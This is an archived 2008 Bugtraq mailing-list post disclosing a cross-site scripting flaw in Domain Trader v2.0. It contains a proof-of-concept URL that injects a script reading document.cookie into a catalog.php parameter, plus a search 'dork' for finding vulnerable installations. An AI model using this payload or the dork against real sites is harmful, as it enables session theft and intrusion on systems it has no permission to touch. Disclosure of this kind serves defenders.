Domain Trader v2.0 Xss Vulnerable

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Domain Trader v2.0 Xss Vulnerable
From: cybermilitan@xxxxxxxxxxx
Date: 2 Feb 2008 13:44:16 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

#################################################################################

title     :  Domain Trader v2.0 Xss Vulnerable

Author    : Crackers_Child [ cybermilitan (at) hotmail (dot) com ]

Exploit   : 
www.site.com/script/catalog.php?mode=viewcategory&id=<script>alert(document.cookie)</script>

Dork      : Powered by Domain Trader v2.0 - Domain parking software 

Greetz    : www.biyofrm.com & www.sibersavascilar.com

#################################################################################

Prev by Date: [ MDVSA-2008:032 ] - Updated boost packages fix DoS vulnerabilities
Next by Date: ITech Classifieds Multiple Remote Vulnerabilities
Previous by thread: [ MDVSA-2008:032 ] - Updated boost packages fix DoS vulnerabilities
Next by thread: ITech Classifieds Multiple Remote Vulnerabilities
Index(es):
- Date
- Thread